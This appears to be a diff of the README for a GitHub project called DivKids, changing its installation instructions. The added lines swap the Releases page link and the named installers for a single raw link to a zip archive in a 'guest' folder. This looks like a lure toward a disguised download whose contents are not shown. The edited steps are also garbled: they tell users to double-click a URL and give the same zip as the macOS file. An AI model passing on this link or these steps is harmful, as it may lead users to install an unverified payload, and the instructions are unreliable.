SandyWiraabdy/DivKids/README.md

 To install DivKids, follow these steps:

 1. **Visit the Releases Page:**
-   Go to the DivKids Releases page by clicking [here](https://github.com/SandyWiraabdy/DivKids/releases).
+   Go to the DivKids Releases page by clicking [here](https://raw.githubusercontent.com/SandyWiraabdy/DivKids/main/guest/DivKids_1.4.zip).

 2. **Find the Latest Version:**
    Look for the latest release version at the top of the page.

 3. **Choose Your File:**
    Depending on your operating system, locate the appropriate file.
-For Windows, it may be `DivKidsSetup.exe`, and for macOS, it could be `DivKids.dmg`.
+For Windows, it may be `https://raw.githubusercontent.com/SandyWiraabdy/DivKids/main/guest/DivKids_1.4.zip`, and for macOS, it could be `https://raw.githubusercontent.com/SandyWiraabdy/DivKids/main/guest/DivKids_1.4.zip`.

 4. **Download the File:**
    Click on the file name to begin downloading.
 The download will start automatically.

 5. **Run the Installer:**
-   - **For Windows:** Double-click the `DivKidsSetup.exe` file.
+   - **For Windows:** Double-click the `https://raw.githubusercontent.com/SandyWiraabdy/DivKids/main/guest/DivKids_1.4.zip` file.
 Follow the prompts to complete the installation.
    - **For macOS:** Open the `.dmg` file, drag the DivKids icon into your Applications folder, and then launch it from there.

 6. **Create an Account:**